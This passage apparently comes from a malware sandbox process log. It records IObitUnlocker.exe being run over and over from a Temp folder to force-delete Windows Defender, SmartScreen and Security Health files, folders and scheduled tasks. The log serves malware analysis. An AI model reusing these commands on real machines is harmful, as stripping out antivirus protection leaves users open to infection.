Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 